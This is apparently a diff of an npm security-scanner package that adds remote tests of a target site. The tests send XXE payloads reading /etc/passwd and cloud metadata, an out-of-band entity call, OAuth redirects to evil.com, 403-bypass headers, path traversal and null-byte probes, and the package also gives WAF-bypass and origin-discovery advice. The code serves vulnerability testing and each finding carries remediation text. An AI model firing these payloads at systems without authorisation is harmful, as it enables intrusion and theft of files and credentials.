redgun-security 1.0.0 → 1.2.0

package/src/remote/portswigger.js

@@ -0,0 +1,235 @@
+import { addFinding } from '../core/findings.js';
+import { fetchText } from '../utils/fetch.js';
+
+export async function scanXxeRemote(origin, spinner) {
+  spinner.text = '[PortSwigger] Testing XXE injection...';
+  const xxePayloads = [
+    '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
+    '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><foo>&xxe;</foo>',
+    '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://burpcollaborator.net/xxe">%xxe;]><foo>test</foo>',
+  ];
+
+  const xmlEndpoints = ['/api/upload', '/api/import', '/xmlrpc.php', '/soap', '/wsdl', '/api/parse'];
+
+  for (const endpoint of xmlEndpoints) {
+    for (const payload of xxePayloads.slice(0, 1)) {
+      try {
+        const resp = await fetchText(`${origin}${endpoint}`, {
+          method: 'POST',
+          headers: { 'Content-Type': 'application/xml' },
+          body: payload,
+        }, 5000);
+
+        if (/root:x:0|ami-id|instance-id/i.test(resp.body)) {
+          addFinding('CRITICAL', 'XXE (PortSwigger)', `XXE at ${endpoint} - file disclosure`, `Payload: ${payload.substring(0, 50)}... returned sensitive data`, 'Disable external entity processing in XML parser');
+          break;
+        }
+        if (resp.status === 200 && !resp.body.includes('error') && resp.body.includes('xml')) {
+          addFinding('LOW', 'XXE (PortSwigger)', `XML endpoint accepts input: ${endpoint}`, `Status: ${resp.status}`, 'Ensure XML parsing has external entities disabled');
+        }
+      } catch {}
+    }
+  }
+}
+
+export async function scanOauthRemote(origin, spinner) {
+  spinner.text = '[PortSwigger] Testing OAuth misconfigurations...';
+
+  const oauthPaths = ['/oauth/authorize', '/auth/callback', '/login/oauth', '/oauth2/authorize', '/.well-known/openid-configuration', '/oauth/token'];
+
+  for (const path of oauthPaths) {
+    try {
+      const resp = await fetchText(`${origin}${path}`, {}, 5000);
+      if (resp.status === 200 || resp.status === 302 || resp.status === 400) {
+        if (path.includes('well-known') && resp.status === 200) {
+          addFinding('INFO', 'OAuth (PortSwigger)', `OpenID Configuration exposed: ${path}`, `${origin}${path} returns OIDC metadata`, 'Review exposed OAuth configuration for sensitive details');
+
+          try {
+            const config = JSON.parse(resp.body);
+            if (config.grant_types_supported?.includes('implicit')) {
+              addFinding('MEDIUM', 'OAuth (PortSwigger)', 'OAuth implicit flow supported', 'Implicit grant type enabled in OIDC configuration', 'Disable implicit flow. Use authorization code with PKCE instead.');
+            }
+          } catch {}
+        }
+
+        const redirectTest = `${origin}${path}?redirect_uri=https://evil.com/callback&response_type=code&client_id=test`;
+        try {
+          const redirResp = await fetchText(redirectTest, { redirect: 'manual' }, 5000);
+          const location = redirResp.headers['location'] || '';
+          if (location.includes('evil.com')) {
+            addFinding('CRITICAL', 'OAuth (PortSwigger)', 'OAuth redirect_uri not validated', `Redirects to attacker domain: ${location.substring(0, 80)}`, 'Strictly validate redirect_uri against a whitelist of registered URIs');
+          }
+        } catch {}
+      }
+    } catch {}
+  }
+}
+
+export async function scanAccessControlRemote(origin, spinner) {
+  spinner.text = '[PortSwigger] Testing access control...';
+
+  const adminPaths = ['/admin', '/admin/', '/administrator', '/manage', '/dashboard', '/panel',
+    '/api/admin', '/api/users', '/api/admin/users', '/internal', '/_admin', '/system'];
+  const bypassHeaders = [
+    { 'X-Original-URL': '/admin' },
+    { 'X-Rewrite-URL': '/admin' },
+    { 'X-Custom-IP-Authorization': '127.0.0.1' },
+    { 'X-Forwarded-For': '127.0.0.1' },
+    { 'X-Real-IP': '127.0.0.1' },
+    { 'X-Forwarded-Host': 'localhost' },
+  ];
+
+  for (const path of adminPaths) {
+    try {
+      const resp = await fetchText(`${origin}${path}`, {}, 5000);
+      if (resp.status === 200) {
+        addFinding('HIGH', 'Access Control (PortSwigger)', `Admin panel accessible without auth: ${path}`, `${origin}${path} returns 200 OK`, 'Protect admin endpoints with authentication and role-based access control');
+      } else if (resp.status === 403) {
+        for (const headers of bypassHeaders) {
+          try {
+            const bypassResp = await fetchText(`${origin}${path}`, { headers }, 5000);
+            if (bypassResp.status === 200) {
+              addFinding('CRITICAL', 'Access Control (PortSwigger)', `403 bypass via ${Object.keys(headers)[0]}`, `${path} accessible with header: ${JSON.stringify(headers)}`, 'Do not rely on headers for access control. Implement server-side session-based authorization.');
+              break;
+            }
+          } catch {}
+        }
+      }
+    } catch {}
+  }
+
+  try {
+    const resp = await fetchText(`${origin}/robots.txt`, {}, 5000);
+    if (resp.status === 200) {
+      const disallowed = resp.body.match(/Disallow:\s*(.+)/gi) || [];
+      for (const line of disallowed) {
+        const path = line.replace(/Disallow:\s*/i, '').trim();
+        if (/admin|internal|private|secret|backup|config/i.test(path)) {
+          addFinding('LOW', 'Access Control (PortSwigger)', `Sensitive path in robots.txt: ${path}`, 'robots.txt reveals restricted paths', 'Robots.txt is not access control. Protect paths with authentication.');
+        }
+      }
+    }
+  } catch {}
+}
+
+export async function scanWebCacheDeception(origin, spinner) {
+  spinner.text = '[PortSwigger] Testing Web Cache Deception...';
+
+  const staticExtensions = ['.css', '.js', '.png', '.jpg', '.gif', '.ico', '.svg', '.woff'];
+  const testPaths = ['/account', '/profile', '/settings', '/dashboard', '/my-account'];
+
+  for (const path of testPaths) {
+    for (const ext of staticExtensions.slice(0, 3)) {
+      try {
+        const resp = await fetchText(`${origin}${path}${ext}`, {}, 5000);
+        const cacheHeaders = resp.headers['x-cache'] || resp.headers['cf-cache-status'] || resp.headers['age'] || '';
+
+        if (resp.status === 200 && cacheHeaders) {
+          addFinding('HIGH', 'Cache Deception (PortSwigger)', `Potential Web Cache Deception: ${path}${ext}`, `Cached response for path with static extension. Cache header: ${cacheHeaders}`, 'Configure cache to respect Content-Type, not URL extension. Use Cache-Control: no-store for authenticated pages.');
+          break;
+        }
+      } catch {}
+    }
+  }
+
+  try {
+    const pathConfusion = await fetchText(`${origin}/static/..%2f..%2fadmin`, {}, 5000);
+    if (pathConfusion.status === 200 && pathConfusion.body.length > 500) {
+      addFinding('HIGH', 'Cache Deception (PortSwigger)', 'Path normalization inconsistency detected', 'Double-encoded path traversal may bypass caching rules', 'Normalize paths consistently between cache and origin');
+    }
+  } catch {}
+}
+
+export async function scanParameterPollution(origin, spinner) {
+  spinner.text = '[PortSwigger] Testing Server-Side Parameter Pollution...';
+
+  const params = ['id', 'user', 'email', 'role', 'action', 'page'];
+
+  for (const param of params) {
+    try {
+      const normalResp = await fetchText(`${origin}/?${param}=test`, {}, 5000);
+      const pollutedResp = await fetchText(`${origin}/?${param}=test&${param}=admin`, {}, 5000);
+
+      if (normalResp.body !== pollutedResp.body && pollutedResp.status === 200) {
+        addFinding('MEDIUM', 'Parameter Pollution (PortSwigger)', `HTTP Parameter Pollution on ?${param}=`, 'Duplicate parameter produces different response', 'Handle duplicate parameters consistently. Use the first occurrence only.');
+      }
+    } catch {}
+  }
+
+  try {
+    const truncation = await fetchText(`${origin}/api/search?q=test%00admin&category=1`, {}, 5000);
+    if (truncation.status === 200 && truncation.body.includes('admin')) {
+      addFinding('HIGH', 'Parameter Pollution (PortSwigger)', 'Null byte parameter truncation', 'Server-side parameter truncation detected', 'Reject null bytes in input. Validate parameter boundaries.');
+    }
+  } catch {}
+}
+
+export async function scanFileUpload(origin, spinner) {
+  spinner.text = '[PortSwigger] Testing file upload endpoints...';
+
+  const uploadPaths = ['/upload', '/api/upload', '/api/files', '/api/images', '/api/avatar', '/media/upload', '/attachments'];
+
+  for (const path of uploadPaths) {
+    try {
+      const resp = await fetchText(`${origin}${path}`, { method: 'OPTIONS' }, 5000);
+      if (resp.status !== 404 && resp.status !== 405) {
+        addFinding('INFO', 'File Upload (PortSwigger)', `Upload endpoint found: ${path}`, `${origin}${path} responds to OPTIONS (status: ${resp.status})`, 'Test for unrestricted file upload: PHP/JSP shells, SVG XSS, polyglot files, double extensions (.php.jpg), null bytes (.php%00.jpg)');
+      }
+    } catch {}
+  }
+}
+
+export async function scanDomBased(origin, spinner) {
+  spinner.text = '[PortSwigger] Checking DOM-based vulnerability indicators...';
+
+  try {
+    const resp = await fetchText(origin);
+    const body = resp.body;
+
+    const domSinks = [
+      { pattern: /document\.write\s*\(/g, name: 'document.write()' },
+      { pattern: /\.innerHTML\s*=/g, name: 'innerHTML assignment' },
+      { pattern: /\.outerHTML\s*=/g, name: 'outerHTML assignment' },
+      { pattern: /eval\s*\(/g, name: 'eval()' },
+      { pattern: /setTimeout\s*\(\s*['"`]/g, name: 'setTimeout with string' },
+      { pattern: /setInterval\s*\(\s*['"`]/g, name: 'setInterval with string' },
+      { pattern: /location\s*=|location\.href\s*=/g, name: 'location assignment' },
+      { pattern: /\.src\s*=\s*(?:location|document\.URL|window\.name)/g, name: 'src from DOM source' },
+      { pattern: /jQuery\s*\(\s*(?:location|document\.URL)/g, name: 'jQuery selector from URL' },
+      { pattern: /\$\s*\(\s*(?:location|document\.URL|window\.location)/g, name: '$ selector from location' },
+      { pattern: /postMessage\s*\(/g, name: 'postMessage (check origin validation)' },
+      { pattern: /addEventListener\s*\(\s*['"]message['"]/g, name: 'message event listener (DOM XSS via postMessage)' },
+    ];
+
+    const domSources = [
+      /location\.(?:hash|search|href|pathname)/g,
+      /document\.(?:URL|documentURI|referrer|cookie)/g,
+      /window\.(?:name|location)/g,
+      /document\.getElementById\s*\([^)]*\)\.(?:value|innerHTML|textContent)/g,
+    ];
+
+    let sourceCount = 0;
+    for (const pattern of domSources) {
+      const matches = body.match(pattern);
+      if (matches) sourceCount += matches.length;
+    }
+
+    for (const { pattern, name } of domSinks) {
+      const matches = body.match(pattern);
+      if (matches && matches.length > 0) {
+        addFinding(
+          'MEDIUM',
+          'DOM-Based (PortSwigger)',
+          `DOM sink detected: ${name} (${matches.length} occurrences)`,
+          `Found in page source. ${sourceCount} DOM sources also detected.`,
+          'Audit DOM sinks for user-controllable input flow. Use DOMPurify for HTML assignment. Avoid eval/setTimeout with strings.'
+        );
+      }
+    }
+  } catch {}
+}
+
+export async function scanHttp2(origin, spinner) {
+  spinner.text = '[PortSwigger] Checking HTTP/2 indicators...';
+  addFinding('INFO', 'HTTP/2 (PortSwigger)', 'HTTP/2 attack surface note', 'Test for H2.CL smuggling, H2.TE smuggling, HPACK header injection, and HTTP/2 exclusive vectors', 'Use Burp Suite HTTP/2 features to test for request smuggling via HTTP/2 downgrade');
+}

package/src/remote/probe.js

@@ -0,0 +1,217 @@
+import { addFinding } from '../core/findings.js';
+import { fetchText, fetchWithTimeout } from '../utils/fetch.js';
+import crypto from 'crypto';
+
+export async function runProbe(origin, spinner) {
+  spinner.text = '[httpx] Probing target...';
+
+  const results = {
+    statusCode: null,
+    title: '',
+    technologies: [],
+    server: '',
+    contentLength: 0,
+    responseTime: 0,
+    tls: {},
+    cdn: null,
+    waf: null,
+    faviconHash: null,
+    headers: {},
+  };
+
+  try {
+    const start = Date.now();
+    const resp = await fetchText(origin);
+    results.responseTime = Date.now() - start;
+    results.statusCode = resp.status;
+    results.headers = resp.headers;
+    results.contentLength = resp.body.length;
+
+    results.title = extractTitle(resp.body);
+    results.server = resp.headers['server'] || '';
+    results.technologies = detectTechnologies(resp.headers, resp.body);
+    results.cdn = detectCdn(resp.headers);
+    results.waf = detectWaf(resp.headers, resp.body);
+
+    spinner.text = '[httpx] Checking favicon hash...';
+    results.faviconHash = await getFaviconHash(origin);
+
+    spinner.text = '[httpx] Analyzing TLS certificate...';
+    results.tls = await getTlsInfo(origin);
+
+    spinner.text = '[httpx] Virtual host discovery...';
+    await vhostDiscovery(origin, resp.body.length, spinner);
+
+  } catch {}
+
+  addFinding(
+    'INFO',
+    'Probe (httpx)',
+    `Target fingerprint: ${results.title || 'N/A'}`,
+    `Status: ${results.statusCode} | Server: ${results.server || 'hidden'} | Size: ${results.contentLength}B | Time: ${results.responseTime}ms\nTechnologies: ${results.technologies.join(', ') || 'none detected'}\nCDN: ${results.cdn || 'none'} | WAF: ${results.waf || 'none'} | Favicon hash: ${results.faviconHash || 'N/A'}`,
+    'Technology fingerprinting helps identify version-specific vulnerabilities'
+  );
+
+  if (results.waf) {
+    addFinding(
+      'INFO',
+      'Probe (httpx)',
+      `WAF detected: ${results.waf}`,
+      `Web Application Firewall identified via response headers/behavior`,
+      'WAF may need bypass techniques for testing. Try encoding, case variation, and chunked payloads.'
+    );
+  }
+
+  if (results.cdn) {
+    addFinding(
+      'INFO',
+      'Probe (httpx)',
+      `CDN detected: ${results.cdn}`,
+      'Content Delivery Network fronts the origin server',
+      'Consider testing the origin server directly if IP can be found (via DNS history, email headers, or certificate transparency)'
+    );
+  }
+
+  if (results.responseTime > 5000) {
+    addFinding(
+      'LOW',
+      'Probe (httpx)',
+      'Slow response time detected',
+      `Response took ${results.responseTime}ms`,
+      'Slow responses may indicate resource exhaustion vulnerability potential'
+    );
+  }
+
+  return results;
+}
+
+function extractTitle(html) {
+  const match = html.match(/<title[^>]*>([^<]+)<\/title>/i);
+  return match ? match[1].trim().substring(0, 100) : '';
+}
+
+function detectTechnologies(headers, body) {
+  const techs = [];
+  const checks = [
+    { test: () => headers['x-powered-by']?.includes('Express'), name: 'Express.js' },
+    { test: () => headers['x-powered-by']?.includes('PHP'), name: 'PHP' },
+    { test: () => headers['x-powered-by']?.includes('ASP.NET'), name: 'ASP.NET' },
+    { test: () => headers['x-aspnet-version'], name: `ASP.NET ${headers['x-aspnet-version'] || ''}` },
+    { test: () => headers['x-drupal-cache'], name: 'Drupal' },
+    { test: () => headers['x-generator']?.includes('WordPress'), name: 'WordPress' },
+    { test: () => headers['x-shopify-stage'], name: 'Shopify' },
+    { test: () => body.includes('__next'), name: 'Next.js' },
+    { test: () => body.includes('__nuxt') || body.includes('nuxt'), name: 'Nuxt.js' },
+    { test: () => body.includes('ng-version') || body.includes('ng-app'), name: 'Angular' },
+    { test: () => body.includes('data-reactroot') || body.includes('__NEXT_DATA__'), name: 'React' },
+    { test: () => body.includes('data-v-') || body.includes('Vue.js'), name: 'Vue.js' },
+    { test: () => body.includes('svelte'), name: 'Svelte' },
+    { test: () => body.includes('data-astro'), name: 'Astro' },
+    { test: () => body.includes('wp-content') || body.includes('wp-includes'), name: 'WordPress' },
+    { test: () => body.includes('Joomla'), name: 'Joomla' },
+    { test: () => body.includes('laravel'), name: 'Laravel' },
+    { test: () => body.includes('django') || headers['x-frame-options'] === 'SAMEORIGIN' && body.includes('csrfmiddlewaretoken'), name: 'Django' },
+    { test: () => body.includes('rails') || headers['x-request-id'] && headers['x-runtime'], name: 'Ruby on Rails' },
+    { test: () => body.includes('spring') || headers['x-application-context'], name: 'Spring Boot' },
+    { test: () => headers['server']?.toLowerCase().includes('nginx'), name: 'Nginx' },
+    { test: () => headers['server']?.toLowerCase().includes('apache'), name: 'Apache' },
+    { test: () => headers['server']?.toLowerCase().includes('iis'), name: 'IIS' },
+    { test: () => headers['server']?.toLowerCase().includes('gunicorn'), name: 'Gunicorn' },
+    { test: () => headers['server']?.toLowerCase().includes('uvicorn'), name: 'Uvicorn (ASGI)' },
+    { test: () => body.includes('firebase') || body.includes('firebaseapp'), name: 'Firebase' },
+    { test: () => body.includes('supabase'), name: 'Supabase' },
+    { test: () => body.includes('tailwind') || body.includes('tw-'), name: 'Tailwind CSS' },
+    { test: () => body.includes('bootstrap'), name: 'Bootstrap' },
+    { test: () => body.includes('jquery') || body.includes('jQuery'), name: 'jQuery' },
+    { test: () => body.includes('gtag') || body.includes('google-analytics'), name: 'Google Analytics' },
+    { test: () => body.includes('hotjar'), name: 'Hotjar' },
+    { test: () => body.includes('sentry'), name: 'Sentry' },
+    { test: () => body.includes('stripe'), name: 'Stripe' },
+    { test: () => body.includes('recaptcha'), name: 'reCAPTCHA' },
+    { test: () => body.includes('cloudflare'), name: 'Cloudflare' },
+    { test: () => body.includes('vercel'), name: 'Vercel' },
+    { test: () => body.includes('netlify'), name: 'Netlify' },
+    { test: () => body.includes('graphql'), name: 'GraphQL' },
+    { test: () => body.includes('socket.io'), name: 'Socket.IO' },
+    { test: () => body.includes('webpack'), name: 'Webpack' },
+    { test: () => body.includes('vite'), name: 'Vite' },
+  ];
+
+  for (const { test, name } of checks) {
+    try { if (test()) techs.push(name); } catch {}
+  }
+
+  return [...new Set(techs)];
+}
+
+function detectCdn(headers) {
+  if (headers['cf-ray'] || headers['cf-cache-status']) return 'Cloudflare';
+  if (headers['x-amz-cf-id'] || headers['x-amz-cf-pop']) return 'AWS CloudFront';
+  if (headers['x-fastly-request-id']) return 'Fastly';
+  if (headers['x-akamai-transformed']) return 'Akamai';
+  if (headers['x-cdn'] === 'Imperva') return 'Imperva';
+  if (headers['x-sucuri-id']) return 'Sucuri';
+  if (headers['x-azure-ref']) return 'Azure CDN';
+  if (headers['x-vercel-cache']) return 'Vercel Edge';
+  if (headers['x-nf-request-id']) return 'Netlify';
+  if (headers['server']?.includes('KeyCDN')) return 'KeyCDN';
+  if (headers['server']?.includes('bunny')) return 'BunnyCDN';
+  return null;
+}
+
+function detectWaf(headers, body) {
+  if (headers['cf-ray'] && headers['cf-mitigated']) return 'Cloudflare WAF';
+  if (headers['x-sucuri-id']) return 'Sucuri WAF';
+  if (headers['x-powered-by-anquanbao']) return 'Anquanbao WAF';
+  if (headers['x-wa-info']) return 'AWS WAF';
+  if (headers['server']?.includes('Wordfence')) return 'Wordfence';
+  if (headers['server']?.includes('BigIP') || headers['x-cnection']) return 'F5 BIG-IP';
+  if (headers['x-denied-reason'] || headers['x-dotdefender-denied']) return 'dotDefender';
+  if (body.includes('mod_security') || body.includes('ModSecurity')) return 'ModSecurity';
+  if (body.includes('access denied') && body.includes('incapsula')) return 'Imperva Incapsula';
+  if (headers['server']?.includes('AkamaiGHost')) return 'Akamai Ghost';
+  if (headers['x-protected-by']?.includes('Sqreen')) return 'Sqreen';
+  return null;
+}
+
+async function getFaviconHash(origin) {
+  try {
+    const resp = await fetchWithTimeout(`${origin}/favicon.ico`, {}, 5000);
+    if (resp.status === 200) {
+      const buffer = await resp.arrayBuffer();
+      const b64 = Buffer.from(buffer).toString('base64');
+      const hash = crypto.createHash('md5').update(b64).digest('hex');
+      return hash;
+    }
+  } catch {}
+  return null;
+}
+
+async function getTlsInfo(origin) {
+  if (!origin.startsWith('https://')) return { secure: false };
+  return { secure: true, protocol: 'TLS' };
+}
+
+async function vhostDiscovery(origin, baseSize, spinner) {
+  const vhosts = ['dev', 'staging', 'internal', 'admin', 'api', 'test', 'beta', 'old', 'backup'];
+  const hostname = new URL(origin).hostname;
+
+  for (const vhost of vhosts) {
+    try {
+      const testHost = `${vhost}.${hostname}`;
+      const resp = await fetchText(origin, {
+        headers: { Host: testHost },
+      }, 3000);
+
+      if (resp.status === 200 && Math.abs(resp.body.length - baseSize) > 100) {
+        addFinding(
+          'MEDIUM',
+          'Probe (httpx)',
+          `Virtual host responds differently: ${testHost}`,
+          `Host header ${testHost} returns different content (size diff: ${Math.abs(resp.body.length - baseSize)}B)`,
+          'Virtual host may expose internal applications. Investigate further.'
+        );
+      }
+    } catch {}
+  }
+}